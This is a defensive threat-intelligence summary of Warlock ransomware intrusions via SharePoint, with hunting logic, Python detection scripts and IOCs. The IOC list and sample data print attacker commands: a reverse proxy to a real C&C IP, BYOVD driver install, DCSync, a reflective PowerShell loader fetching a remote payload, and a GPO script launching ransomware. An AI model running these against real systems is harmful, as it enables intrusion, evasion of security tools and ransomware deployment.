Severity: critical

Web Shells, Tunnels, and Ransomware: Dissecting a Warlock Attack

The Warlock ransomware group (Water Manaul) has enhanced its attack chain by exploiting Microsoft SharePoint servers for initial access and deploying a sophisticated post-exploitation toolkit. The group leverages BYOVD techniques via the NSecKrnl.sys driver to disable security tools, establishes redundant C&C channels using legitimate tools like Velociraptor and Cloudflare Tunnels, and automates ransomware deployment domain-wide using Group Policy Objects (GPO).

Sens: Immediate | Conf: high | Analyzed: 2026-03-16

Authors: Maristel Policarpio, Junestherry Dela Cruz, Sarah Pearl Camiling, Jacob Santos, Don Ovid Ladores

Actors: Warlock, Water Manaul

Source: Trend Micro


Key Takeaways

  • The Warlock ransomware group (Water Manaul) exploits unpatched Microsoft SharePoint servers for initial access.
  • Attackers use a BYOVD technique, loading the vulnerable NSecKrnl.sys driver to terminate security products from kernel mode.
  • The group's expanded toolkit includes TightVNC, Yuze, VS Code tunnels, and Cloudflare Tunnels for redundant C&C and lateral movement.
  • Ransomware deployment is automated domain-wide via Active Directory Group Policy Objects (GPO).

Affected Systems

  • Microsoft SharePoint servers
  • Windows Active Directory
  • Windows Endpoints

Vulnerabilities (CVEs)

  • Unpatched Microsoft SharePoint vulnerabilities (CVEs not explicitly named)

Attack Chain

The attack begins with the exploitation of unpatched Microsoft SharePoint servers, allowing the threat actors to spawn a Cobalt Strike beacon via DLL sideloading. Following initial access, the attackers perform credential dumping using DCSync and move laterally using tools like PsExec, TightVNC, and PSRemoting. They establish redundant C&C channels using Velociraptor, VS Code tunnels, Cloudflare Tunnels, and Yuze. Finally, they deploy a BYOVD tool (NSecKrnl.sys) to disable security products and distribute the ransomware payload (run.dll) domain-wide via Active Directory Group Policy Objects (GPO).

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: Yes
  • Platforms: Trend Micro Vision One

The article provides several hunting queries designed for Trend Micro Vision One to detect ransomware note creation, suspicious ASPX file creation, and encoded PowerShell execution.

Detection Engineering Assessment

  • EDR Visibility: High. The attack involves extensive process execution (w3wp.exe spawning cmd/powershell), DLL sideloading, service creation (sc create), and in-memory .NET loading, all of which are highly visible to modern EDRs.
  • Network Visibility: Medium. While initial access and some C2 might be visible, the heavy use of encrypted tunnels (Cloudflare, VS Code, Yuze) and legitimate cloud services (Supabase, S3) blends malicious traffic with benign activity.
  • Detection Difficulty: Hard. The attackers heavily abuse legitimate, dual-use tools (Velociraptor, VS Code, Cloudflare, rclone) and employ BYOVD to blind security products, making behavioral detection challenging without high false positive rates.

Required Log Sources

  • Windows Security Event Log (Event ID 4688, 4624)
  • PowerShell Operational Logs (Event ID 4104)
  • Sysmon (Event ID 1, 3, 11, 13)

Hunting Hypotheses

  • Hypothesis: Look for the IIS worker process (w3wp.exe) spawning suspicious child processes such as cmd.exe or powershell.exe, or dropping executable files in C:\Temp or C:\ProgramData. | Telemetry: Process creation logs (Event ID 4688 or Sysmon Event ID 1) | ATT&CK Stage: Initial Access / Execution | FP Risk: Low
  • Hypothesis: Identify PowerShell executions containing '[Reflection.Assembly]' and 'DownloadData', indicating reflective in-memory loading of remote payloads. | Telemetry: PowerShell Script Block Logging (Event ID 4104) | ATT&CK Stage: Execution / Defense Evasion | FP Risk: Medium
  • Hypothesis: Monitor for the creation of new kernel driver services (sc create) pointing to user directories (e.g., C:\Users), which may indicate BYOVD staging. | Telemetry: System Event Logs (Event ID 7045) or Process Creation (sc.exe) | ATT&CK Stage: Defense Evasion | FP Risk: Low
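The three hypotheses above as runnable hunting logic, added here as an example; it is not code from the Trend Micro report or from this page. The event records are constructed to resemble Sysmon 1 / Security 4688 / PowerShell 4104 / System 7045 entries, and the field names, the set of shell-like child processes and the writable-directory prefixes are this example's own assumptions. It goes one step beyond the table by also decoding -EncodedCommand payloads from process command lines, so the reflective-loading check covers the encoded PowerShell the page's Vision One queries target.

```python
import base64
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Minimal normalised event; field names are this example's own, not a SIEM schema."""
    event_id: int            # 1/4688 process create, 4104 script block, 7045 service install
    parent_image: str = ""
    image: str = ""
    command_line: str = ""
    script_block: str = ""   # 4104 ScriptBlockText
    image_path: str = ""     # 7045 ImagePath


def basename(path: str) -> str:
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def norm_path(path: str) -> str:
    """Lower-case, strip quotes and the \\??\\ NT prefix so prefix checks work on 7045 paths."""
    p = path.strip().strip('"').lower()
    return p[4:] if p.startswith("\\??\\") else p


# H1: w3wp.exe spawning shells, or its children being run out of C:\Temp / C:\ProgramData
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "msiexec.exe", "rundll32.exe"}
STAGING_DIRS = ("c:\\temp\\", "c:\\programdata\\")


def h1_w3wp_child(ev: Event) -> bool:
    if ev.event_id not in (1, 4688) or basename(ev.parent_image) != "w3wp.exe":
        return False
    cl = ev.command_line.lower()
    return basename(ev.image) in SHELL_CHILDREN or any(d in cl for d in STAGING_DIRS)


# H2: reflective .NET loading from a remote URL, in clear script blocks or -EncodedCommand
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c|n)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if none/invalid."""
    m = ENC_RE.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def h2_reflective_load(ev: Event) -> bool:
    text = ev.script_block if ev.event_id == 4104 else decode_encoded_command(ev.command_line)
    t = text.lower()
    # "reflection.assembly]" also matches the fully qualified [System.Reflection.Assembly]
    return "reflection.assembly]" in t and "downloaddata" in t


# H3: a driver service whose image lives in a user-writable directory (BYOVD staging)
BINPATH_RE = re.compile(r'binpath=\s*(?:"([^"]+)"|(\S+))', re.I)
TYPE_RE = re.compile(r"type=\s*(?:kernel|filesys)", re.I)
USER_WRITABLE = ("c:\\users\\", "c:\\temp\\", "c:\\programdata\\")


def h3_driver_from_user_dir(ev: Event) -> bool:
    if ev.event_id == 7045:
        path, driver_hint = ev.image_path, False
    elif ev.event_id in (1, 4688) and basename(ev.image) == "sc.exe" \
            and re.search(r"\bcreate\b", ev.command_line, re.I):
        m = BINPATH_RE.search(ev.command_line)
        if not m:
            return False
        path, driver_hint = m.group(1) or m.group(2), bool(TYPE_RE.search(ev.command_line))
    else:
        return False
    p = norm_path(path)
    return p.startswith(USER_WRITABLE) and (p.endswith(".sys") or driver_hint)


HYPOTHESES = (("H1", h1_w3wp_child), ("H2", h2_reflective_load), ("H3", h3_driver_from_user_dir))


def hunt(events):
    """Return (hypothesis, event index) for every event a hypothesis fires on."""
    return [(name, i) for i, ev in enumerate(events) for name, fn in HYPOTHESES if fn(ev)]


# Constructed sample telemetry (not from the report); paths mirror those listed on this page.
W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
REFLECTIVE = ("[Reflection.Assembly]::Load((New-Object Net.WebClient)"
              ".DownloadData('https://litter.catbox.moe/zqqxb3.txt'))")
ENCODED = base64.b64encode(REFLECTIVE.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    Event(1, parent_image=W3WP, image=r"C:\Windows\System32\cmd.exe",
          command_line=r"cmd.exe /c C:\ProgramData\vs.bat"),                         # 0: H1
    Event(4688, parent_image=W3WP, image=r"C:\Windows\System32\msiexec.exe",
          command_line=r"msiexec.exe /i C:\Temp\v4.msi /qn"),                        # 1: H1
    Event(1, parent_image=r"C:\Windows\System32\services.exe",
          image=r"C:\Windows\System32\cmd.exe", command_line="cmd.exe /c whoami"),   # 2: benign
    Event(4104, script_block=REFLECTIVE),                                             # 3: H2
    Event(4688, parent_image=W3WP, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          command_line=f"powershell.exe -nop -w hidden -enc {ENCODED}"),             # 4: H1 + H2
    Event(4688, image=r"C:\Windows\System32\sc.exe",
          command_line=r'sc create NSecKrnl binPath= "c:\users\[REDACTED]\NSecKrnl.sys" type=filesys'),  # 5: H3
    Event(7045, image_path=r"\??\C:\Users\[REDACTED]\NSecKrnl.sys"),                  # 6: H3
    Event(7045, image_path=r"C:\Windows\System32\drivers\vmci.sys"),                  # 7: benign
    Event(4688, image=r"C:\Windows\System32\sc.exe",
          command_line=r'sc create MyAgent binPath= "C:\Program Files\Agent\agent.exe"'),  # 8: benign
]

if __name__ == "__main__":
    for name, idx in hunt(SAMPLE_EVENTS):
        print(f"{name}: event {idx} -> {SAMPLE_EVENTS[idx]}")
```

Event 4 fires twice on purpose: the encoded command is both a w3wp.exe child (H1) and, once decoded, a reflective loader (H2). H3 accepts either the sc.exe command line or the resulting 7045 record, so it still fires when one of the two sources is missing from the SIEM.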

Control Gaps

  • Lack of strict driver allowlisting (Vulnerable Driver Blocklist)
  • Unrestricted outbound access for dual-use tunneling tools (Cloudflare, VS Code)

Key Behavioral Indicators

  • w3wp.exe spawning msiexec.exe or cmd.exe
  • rundll32.exe executing keymgr.dll
  • cloudflared.exe installed as a service
  • TrendSecurity.exe terminating multiple AV/EDR processes

False Positive Assessment

  • Medium

Recommendations

Immediate Mitigation

  • Patch all on-premises Microsoft SharePoint servers immediately.
  • Block known malicious domains and IPs (e.g., code[.]translatevv[.]com, 198[.]13[.]158[.]193).
  • Search for and remove unauthorized web shells (e.g., cproxy.aspx) and dropped binaries in C:\Temp and C:\ProgramData.

Infrastructure Hardening

  • Implement strict driver allowlisting to block vulnerable drivers like NSecKrnl.sys.
  • Restrict outbound network access for servers to prevent unauthorized tunneling (Cloudflare, VS Code, Yuze).
  • Segment administrative tools and protocols (RDP, SMB) to dedicated management networks.

User Protection

  • Enforce Multi-Factor Authentication (MFA) on all external access points.
  • Deploy EDR solutions with anti-tampering and kernel-level monitoring capabilities.

Security Awareness

  • Train SOC analysts to recognize the abuse of dual-use tools like Velociraptor, rclone, and VS Code for malicious purposes.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1505.003 - Server Software Component: Web Shell
  • T1068 - Exploitation for Privilege Escalation
  • T1218.011 - System Binary Proxy Execution: Rundll32
  • T1027 - Obfuscated Files or Information
  • T1562.001 - Impair Defenses: Disable or Modify Tools
  • T1620 - Reflective Code Loading
  • T1003.006 - OS Credential Dumping: DCSync
  • T1087.002 - Account Discovery: Domain Account
  • T1021.002 - Remote Services: SMB/Windows Admin Shares
  • T1021.001 - Remote Services: Remote Desktop Protocol
  • T1021.006 - Remote Services: Windows Remote Management
  • T1560.001 - Archive Collected Data: Archive via Utility
  • T1095 - Non-Application Layer Protocol
  • T1572 - Protocol Tunneling
  • T1105 - Ingress Tool Transfer
  • T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C&C Protocol
  • T1486 - Data Encrypted for Impact

Additional IOCs

  • IPs:
    • 198[.]13[.]158[.]193 - Yuze C&C server IP address.
    • 127[.]0[.]0[.]1 - Localhost IP used for Cloudflare quick tunnel proxying.
  • Domains:
    • code[.]translatevv[.]com - Cobalt Strike C&C domain.
    • vdfccjpnedujhrzscjtq[.]supabase[.]co - Payload hosting domain on Supabase.
    • litter[.]catbox[.]moe - File hosting service used to host in-memory .NET payloads.
    • files[.]catbox[.]moe - File hosting service used to host malicious DLLs.
    • blnwx[.]com - Domain associated with the 198.13.158.193 VPS infrastructure.
    • vscode[.]download[.]prss[.]microsoft[.]com - Legitimate Microsoft domain abused to download VS Code CLI for tunneling.
    • www[.]tightvnc[.]com - Legitimate domain abused to download TightVNC for lateral movement.
  • Urls:
    • hxxps://vdfccjpnedujhrzscjtq[.]supabase[.]co/storage/v1/object/public/image/v4[.]msi - URL hosting the Velociraptor MSI installer.
    • hxxps://litter[.]catbox[.]moe/zqqxb3[.]txt - URL hosting an in-memory .NET payload.
    • hxxps://files[.]catbox[.]moe/wzsjlw[.]dll - URL hosting a malicious DLL payload.
    • hxxps://litter[.]catbox[.]moe/uaw2gm[.]txt - URL hosting an in-memory .NET payload.
    • hxxps://www[.]tightvnc[.]com/download/2.8.85/tightvnc-2.8.85-gpl-setup-64bit.msi - URL used to download TightVNC.
    • hxxps://vscode[.]download[.]prss[.]microsoft[.]com/dbazure/download/insider/09401e712d4ffa5e497787978fe90c1557a0092b/vscode_cli_win32_x64_cli.zip - URL used to download the VS Code CLI.
  • File Paths:
    • C:\Temp\EndProcess.exe - Utility dropped by w3wp.exe to terminate security products.
    • C:\ProgramData\vs.bat - Batch script executed by w3wp.exe to facilitate web shell deployment.
    • C:\ProgramData\cproxy.aspx - Web shell written to disk for persistence.
    • C:\Windows\PSEXEC<REDACTED>.key - Artifact indicating PsExec lateral movement.
    • C:\ProgramData\Microsoft\AppV\code.zip - Downloaded VS Code CLI archive.
    • C:\Users\[REDACTED]\.vscode\cli\tunnel-service.log - Log file for the VS Code tunnel service.
    • c:\users\[REDACTED]\NSecKrnl.sys - Path to the vulnerable driver used for BYOVD.
    • \\[VICTIM-DOMAIN]\SYSVOL\[VICTIM-DOMAIN]\scripts\run\run.dll - Ransomware payload staged in SYSVOL for GPO deployment.
    • \\[VICTIM-DOMAIN]\SYSVOL\[VICTIM-DOMAIN]\scripts\Trend\TrendSecurity.exe - BYOVD loader staged in SYSVOL for GPO deployment.
    • \\[VICTIM-DC]\netlogon\run.bat - Batch script staged in NETLOGON for deployment.
    • \\[VICTIM-DOMAIN]\SysVol\[VICTIM-DOMAIN]\Policies\{5810DB21-959D-45BD-AF4C-0228CEC3C46A}\Machine\Scripts\Startup\CentralStartup.cmd - GPO startup script used for malware deployment.
    • c:\users\public\TrendSecurity.exe - Local path for the BYOVD loader after GPO copy.
    • c:\users\public\run.dll - Local path for the ransomware DLL after GPO copy.
    • lockdatareadme.txt - Ransom note dropped on affected systems.
  • Command Lines:
    • Purpose: Download and install Velociraptor MSI payload silently. | Tools: msiexec.exe | Stage: C&C / Persistence
    • Purpose: Invoke Windows Credential Manager for credential discovery. | Tools: rundll32.exe | Stage: Credential Access | rundll32.exe keymgr.dll,KRShowKeyMgr
    • Purpose: Perform DCSync attack to retrieve user credentials. | Tools: debug.exe | Stage: Credential Access | debug.exe . hs.txt
    • Purpose: Add a domain group to the local Administrators group (the command targets the local group on the host, not Domain Admins). | Tools: net.exe | Stage: Privilege Escalation | net localgroup Administrators "<REDACTED>\Desktop Admins" /ADD
    • Purpose: Install TightVNC silently via MSI for lateral movement. | Tools: msiexec.exe | Stage: Lateral Movement
    • Purpose: Enable PowerShell Remoting for remote administration. | Tools: powershell.exe | Stage: Lateral Movement | powershell.exe "Enable-PSRemoting -Force -SkipNetworkProfileCheck"
    • Purpose: Download VS Code CLI via PowerShell. | Tools: powershell.exe | Stage: C&C
    • Purpose: Reflective in-memory execution of .NET payload. | Tools: powershell.exe | Stage: Execution
    • Purpose: Install Cloudflared as a persistent service. | Tools: cloudflared.exe | Stage: C&C | cloudflared.exe service install <TOKEN>
    • Purpose: Run VS Code CLI in tunnel service mode. | Tools: code-insiders.exe | Stage: C&C | code-insiders.exe" --verbose --cli-data-dir ... tunnel service internal-run
    • Purpose: Execute Yuze reverse proxy. | Tools: rundll32.exe | Stage: C&C | rundll32 yuze.dll,RunYuze reverse -c 198.13.158.193:80
    • Purpose: Create kernel driver service for BYOVD. | Tools: sc.exe | Stage: Defense Evasion | sc create NSecKrnl binPath= "c:\users\[REDACTED]\NSecKrnl.sys" type=filesys
    • Purpose: Exfiltrate data to S3 bucket using renamed rclone. | Tools: TrendFileSecurityCheck.exe | Stage: Exfiltration
    • Purpose: Execute ransomware DLL via rundll32. | Tools: rundll32.exe | Stage: Impact | rundll32 c:\users\public\run.dll,RunCryptor
  • Other:
    • w3wp.exe - SharePoint worker process abused for initial access and spawning malicious child processes.
    • MsMpSrv.exe - Legitimate Microsoft Edge binary used for DLL sideloading.
    • MsEdge.dll - Malicious DLL sideloaded by MsMpSrv.exe.
    • wssocks.exe - .NET payload designed for in-memory execution.
    • yuze.dll - Yuze tunneling tool DLL.
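The SYSVOL and NETLOGON paths under File Paths, together with the GPO startup script and the rundll32 run.dll,RunCryptor command line, describe how the ransomware was pushed domain-wide. Below is a file-system hunt over a SYSVOL replica for that pattern, added here as an example and not taken from the Trend Micro report or from this page. The directory tree it builds in a temp folder follows the page's paths, but the contents of CentralStartup.cmd, the benign contrast script and the detection rules are constructed assumptions; binaries in SYSVOL are reported for review because some software-installation GPOs legitimately stage MSI files there.

```python
import re
import tempfile
from pathlib import Path

GPO_GUID_RE = re.compile(r"^\{[0-9A-F-]{36}\}$", re.I)
SCRIPT_EXT = {".cmd", ".bat", ".ps1", ".vbs"}
BINARY_EXT = {".exe", ".dll", ".sys", ".msi"}

# Content rules for GPO scripts; thresholds and wording are this example's assumptions.
RULES = {
    # rundll32 invoking an exported function from a DLL (the page shows run.dll,RunCryptor)
    "rundll32_export_call": re.compile(r"rundll32(?:\.exe)?\s+\S+\.dll\s*,\s*\w+", re.I),
    # copying payloads from SYSVOL/NETLOGON into the world-writable Public profile
    "copy_from_sysvol_to_public": re.compile(
        r"\b(?:copy|xcopy|robocopy)\b.*?\\(?:sysvol|netlogon)\\.*?\\users\\public\b", re.I),
    # installing a .sys as a service from a startup script (BYOVD staging)
    "driver_service_create": re.compile(r"\bsc(?:\.exe)?\s+create\b.*?\.sys\b", re.I),
}


def scan_sysvol(sysvol: Path):
    """Return sorted (gpo_guid_or_top_dir, relative_path, rule) findings for a SYSVOL tree."""
    findings = []
    for path in sysvol.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(sysvol)
        parts = rel.parts
        # label the finding with the GPO GUID when the file sits under Policies\{GUID}\...
        gpo = next((p for p in parts if GPO_GUID_RE.match(p)), parts[0])
        ext = path.suffix.lower()
        if ext in BINARY_EXT:
            findings.append((gpo, rel.as_posix(), "binary_in_sysvol"))
        elif ext in SCRIPT_EXT:
            text = path.read_text(errors="replace")
            for rule, rx in RULES.items():
                if rx.search(text):
                    findings.append((gpo, rel.as_posix(), rule))
    return sorted(findings)


def build_sample_sysvol(root: Path) -> Path:
    """Constructed SYSVOL replica mirroring the paths on this page; script bodies are invented."""
    sysvol = root / "SYSVOL" / "VICTIM-DOMAIN"
    gpo = sysvol / "Policies" / "{5810DB21-959D-45BD-AF4C-0228CEC3C46A}" / "Machine" / "Scripts" / "Startup"
    gpo.mkdir(parents=True)
    (gpo / "CentralStartup.cmd").write_text(
        "@echo off\r\n"
        "copy \\\\VICTIM-DC\\netlogon\\run.bat c:\\users\\public\\\r\n"
        "copy \\\\VICTIM-DOMAIN\\SYSVOL\\VICTIM-DOMAIN\\scripts\\run\\run.dll c:\\users\\public\\\r\n"
        "rundll32 c:\\users\\public\\run.dll,RunCryptor\r\n")
    (sysvol / "scripts" / "run").mkdir(parents=True)
    (sysvol / "scripts" / "run" / "run.dll").write_bytes(b"MZ")      # placeholder PE header
    (sysvol / "scripts" / "Trend").mkdir()
    (sysvol / "scripts" / "Trend" / "TrendSecurity.exe").write_bytes(b"MZ")
    # Benign contrast: a drive-mapping script under the well-known Default Domain Policy GUID
    benign = sysvol / "Policies" / "{31B2F340-016D-11D2-945F-00C04FB984F9}" / "Machine" / "Scripts" / "Startup"
    benign.mkdir(parents=True)
    (benign / "mapdrives.cmd").write_text("net use H: \\\\fs01\\home /persistent:no\r\n")
    return sysvol


def demo():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_sysvol(build_sample_sysvol(Path(tmp)))


if __name__ == "__main__":
    for gpo, rel, rule in demo():
        print(f"{rule:28} {gpo:40} {rel}")
```

On a live domain, point scan_sysvol at \\<dc>\SYSVOL\<domain> (or a forensic copy) and pair the findings with the GPO's gPCMachineExtensionNames and version attributes in AD, since a startup-script GPO that was created or linked shortly before the ransom notes appeared is the usual tell.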